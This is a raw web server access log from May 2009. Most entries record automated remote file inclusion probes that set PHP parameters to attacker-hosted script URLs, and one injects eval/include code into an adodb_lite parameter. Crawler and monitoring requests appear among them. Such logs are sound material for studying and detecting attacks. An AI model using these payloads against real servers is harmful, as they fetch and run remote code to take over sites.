122.153.212.195 - - [13/May/2009:00:00:22 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:00:22 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.153.212.195 - - [13/May/2009:00:00:22 -0400] "GET /logs/access_log.Q108082100///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.219.97.207 - - [13/May/2009:00:00:30 -0400] "GET /logs/access_log.Q108101100//include/admin.lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:00:30 -0400] "GET //include/admin.lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:00:30 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
196.40.83.75 - - [13/May/2009:00:00:32 -0400] "GET /logs/access_log.Q108120100/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.810"
72.30.79.49 - - [13/May/2009:00:00:36 -0400] "GET /logs/access_log.Q107112700 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.71.102.239 - - [13/May/2009:00:00:47 -0400] "GET /logs/access_log.Q109021500%20%20//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:00:51 -0400] "GET /logs/access_log.Q108112200//index2.php?page=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:00:51 -0400] "GET /logs/access_log.Q108100700//index2.php?page=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.172.126.16 - - [13/May/2009:00:00:55 -0400] "GET /logs/error_log.Q109020400/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
69.172.126.16 - - [13/May/2009:00:00:56 -0400] "GET /logs/error_log.Q108102700/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
72.30.79.49 - - [13/May/2009:00:00:56 -0400] "GET /logs/access_log.Q108032100 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.71.102.239 - - [13/May/2009:00:01:07 -0400] "GET /logs/access_log.Q108121600%20%20//include/write.php?dir=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
196.40.83.75 - - [13/May/2009:00:01:21 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.810"
122.153.212.195 - - [13/May/2009:00:01:49 -0400] "GET /logs/access_log.Q108082100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.15.206.26 - - [13/May/2009:00:01:50 -0400] "GET /logs/access_log.Q108091000/?_SERVER[DOCUMENT_ROOT]=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:00:01:50 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 200 1150 "-" "libwww-perl/5.65"
67.15.206.26 - - [13/May/2009:00:01:50 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.65"
69.172.126.16 - - [13/May/2009:00:01:59 -0400] "GET /logs/error_log.Q108122700/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
67.15.206.26 - - [13/May/2009:00:02:08 -0400] "GET /logs/access_log.Q108082700/?_SERVER[DOCUMENT_ROOT]=http://www.homefindingbook.com/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.65"
122.153.212.195 - - [13/May/2009:00:02:12 -0400] "GET /logs/access_log.Q109050800%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.219.97.207 - - [13/May/2009:00:02:12 -0400] "GET /logs/access_log.Q108091600//include/admin.lib.inc.php?site_path=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:02:23 -0400] "GET /logs/access_log.Q108111600/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:02:23 -0400] "GET /errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:02:23 -0400] "GET /logs/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
202.71.102.239 - - [13/May/2009:00:02:24 -0400] "GET /logs/access_log.Q108103100%20%20/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:02:24 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:02:24 -0400] "GET /e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:00:02:30 -0400] "GET /logs/error_log.Q108010700 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
202.71.102.239 - - [13/May/2009:00:02:35 -0400] "GET /logs/access_log.Q109010300%20%20/e404.php?DOCUMENT_ROOT=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:03:21 -0400] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:03:21 -0400] "GET /logs/access_log.Q108111600%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:03:21 -0400] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [13/May/2009:00:03:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.64.38 - - [13/May/2009:00:03:38 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
124.1.149.222 - - [13/May/2009:00:04:06 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/oltre.txt? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
110.45.144.107 - - [13/May/2009:00:04:08 -0400] "GET /logs/access_log.Q108111600/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:20 -0400] "GET /logs/access_log.Q109032900//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:20 -0400] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:20 -0400] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:21 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:22 -0400] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:22 -0400] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:22 -0400] "GET /logs/access_log.Q109032900//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:22 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:23 -0400] "GET //?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:23 -0400] "GET /logs/access_log.Q109032900//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:23 -0400] "GET /logs//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:04:23 -0400] "GET /logs/access_log.Q108100900//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
202.75.4.169 - - [13/May/2009:00:04:28 -0400] "GET /logs/index.php?option=com_akolegal&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
202.75.4.169 - - [13/May/2009:00:04:30 -0400] "GET /index.php?option=com_akolegal&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
145.253.245.211 - - [13/May/2009:00:04:35 -0400] "GET /logs/error_log.Q108122800/index.php?option=com_akocomment&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
66.219.97.207 - - [13/May/2009:00:04:50 -0400] "GET /logs/access_log.Q108122500//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:04:50 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
66.219.97.207 - - [13/May/2009:00:04:50 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
216.117.191.71 - - [13/May/2009:00:05:05 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:00:05:06 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.65"
216.117.191.71 - - [13/May/2009:00:05:06 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.65"
211.110.19.178 - - [13/May/2009:00:05:12 -0400] "GET /logs///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.110.19.178 - - [13/May/2009:00:05:12 -0400] "GET /logs/access_log.Q108061300///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.19.178 - - [13/May/2009:00:05:12 -0400] "GET ///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
66.219.97.207 - - [13/May/2009:00:05:14 -0400] "GET /logs/access_log.Q108090400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.79"
87.106.135.14 - - [13/May/2009:00:05:32 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:05:32 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
87.106.135.14 - - [13/May/2009:00:05:33 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.805"
211.110.19.178 - - [13/May/2009:00:05:56 -0400] "GET /logs/access_log.Q108100500///skin/zero_vote/error.php?dir=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
66.249.72.114 - - [13/May/2009:00:06:38 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L20480C4C8DC05800B5AC04D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.227.193.198 - - [13/May/2009:00:06:46 -0400] "GET /admin/inc/change_action.php?format_menue=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:00:06:46 -0400] "GET /logs/access_log.Q109020500/admin/inc/change_action.php?format_menue=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
58.227.193.198 - - [13/May/2009:00:06:46 -0400] "GET /logs/admin/inc/change_action.php?format_menue=http://www.mastercraftplumbing.com/help/copyright.txt???? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
203.114.112.155 - - [13/May/2009:00:06:47 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
203.114.112.155 - - [13/May/2009:00:06:47 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
203.114.112.155 - - [13/May/2009:00:06:47 -0400] "GET /logs/access_log.Q108082100%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:07:59 -0400] "GET /logs/access_log.Q109032900%20%20//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:07:59 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:08:02 -0400] "GET /logs/access_log.Q109032900%20%20//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:08:02 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:08:03 -0400] "GET /logs/access_log.Q109032900%20%20//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
67.19.228.18 - - [13/May/2009:00:08:03 -0400] "GET /logs/access_log.Q108100900%20%20//?_zb_path=http://www.steannareptile.it//administrator/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
145.253.245.211 - - [13/May/2009:00:08:20 -0400] "GET /logs/access_log.Q108082900/index.php?option=com_letterman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:08:22 -0400] "GET /index.php?option=com_letterman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:08:23 -0400] "GET /logs/index.php?option=com_letterman&task=view&id=11&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
209.59.12.99 - - [13/May/2009:00:08:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.71.102.239 - - [13/May/2009:00:08:35 -0400] "GET /logs//errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:08:35 -0400] "GET //errors.php?error=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:08:41 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:08:41 -0400] "GET /logs/access_log.Q109012300/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
110.45.144.107 - - [13/May/2009:00:08:41 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
216.117.191.71 - - [13/May/2009:00:09:03 -0400] "GET /logs/access_log.Q108112900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.65"
110.45.144.107 - - [13/May/2009:00:09:05 -0400] "GET /logs/access_log.Q108121900/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.stormtroopers-of-doom.de/laberecke/id.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:09:21 -0400] "GET /logs/access_log.Q108111600%20%20//components/com_flyspray/startdown.php?file=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
202.71.102.239 - - [13/May/2009:00:09:23 -0400] "GET /logs/access_log.Q108111500%20%20//components/com_flyspray/startdown.php?file=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.214.72.235 - - [13/May/2009:00:09:25 -0400] "GET //forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
85.214.72.235 - - [13/May/2009:00:09:25 -0400] "GET /logs/access_log.Q108090500//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.214.72.235 - - [13/May/2009:00:09:25 -0400] "GET /logs/access_log.Q108111500//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.214.72.235 - - [13/May/2009:00:09:26 -0400] "GET /logs//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
88.191.103.144 - - [13/May/2009:00:09:28 -0400] "GET //forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 205 "-" "Mozilla/5.0"
88.191.103.144 - - [13/May/2009:00:09:28 -0400] "GET /logs//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
88.191.103.144 - - [13/May/2009:00:09:28 -0400] "GET /logs/access_log.Q108090500//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
88.191.103.144 - - [13/May/2009:00:09:28 -0400] "GET /logs/access_log.Q108111500//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
69.172.126.16 - - [13/May/2009:00:09:51 -0400] "GET /logs/access_log.Q108110900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.803"
66.219.97.207 - - [13/May/2009:00:09:52 -0400] "GET /logs/access_log.Q109042600/errors.php?error=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
69.172.126.16 - - [13/May/2009:00:09:52 -0400] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.803"
69.172.126.16 - - [13/May/2009:00:09:53 -0400] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.803"
196.40.83.75 - - [13/May/2009:00:10:03 -0400] "GET /logs/access_log.Q108111500//forum/?sourcedir=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.30.79.49 - - [13/May/2009:00:10:24 -0400] "GET /logs/error_log.Q109041500 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
93.187.232.189 - - [13/May/2009:00:11:31 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:00:11:32 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:00:11:32 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:00:11:44 -0400] "GET /logs/access_log.Q108082400//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 284 "-" "libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:00:11:45 -0400] "GET //program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 257 "-" "libwww-perl/5.808"
93.187.232.189 - - [13/May/2009:00:11:45 -0400] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?http://www.ambient-arts.co.uk/us/id.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.808"
202.71.102.239 - - [13/May/2009:00:11:53 -0400] "GET /logs/access_log.Q108062600//include/bbs.lib.inc.php?site_path=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
87.106.135.14 - - [13/May/2009:00:12:01 -0400] "GET /logs/access_log.Q108112900/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.hakcan.com//modules/coppermine/themes/default/MADONGCMD.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.805"
115.145.170.177 - - [13/May/2009:00:12:11 -0400] "GET /logs/access_log.Q108111700//?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 404 226 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
115.145.170.177 - - [13/May/2009:00:12:12 -0400] "GET //?_zb_path=http://ssdnb.net/bbs/vo.txt?? HTTP/1.1" 200 452 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
72.3.226.56 - - [13/May/2009:00:12:15 -0400] "GET //?_zb_path=http://www.loanpricing.com/scripts/id1.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
72.3.226.56 - - [13/May/2009:00:12:15 -0400] "GET /logs//?_zb_path=http://www.loanpricing.com/scripts/id1.txt? HTTP/1.1" 200 1155 "-" "Mozilla/5.0"
72.3.226.56 - - [13/May/2009:00:12:15 -0400] "GET /logs/access_log.Q108100500//?_zb_path=http://www.loanpricing.com/scripts/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
145.253.245.211 - - [13/May/2009:00:12:27 -0400] "GET /logs/access_log.Q108070700/index.php?option=com_swmenufree&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:12:27 -0400] "GET /index.php?option=com_swmenufree&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.803"
145.253.245.211 - - [13/May/2009:00:12:27 -0400] "GET /logs/index.php?option=com_swmenufree&task=view&id=1&Itemid=10&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.803"
24.227.40.189 - - [13/May/2009:00:12:34 -0400] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
24.227.40.189 - - [13/May/2009:00:12:35 -0400] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
24.227.40.189 - - [13/May/2009:00:12:35 -0400] "GET /logs/access_log.Q108091000/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
66.249.72.114 - - [13/May/2009:00:12:36 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L001BC44C09517900F90C05L+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
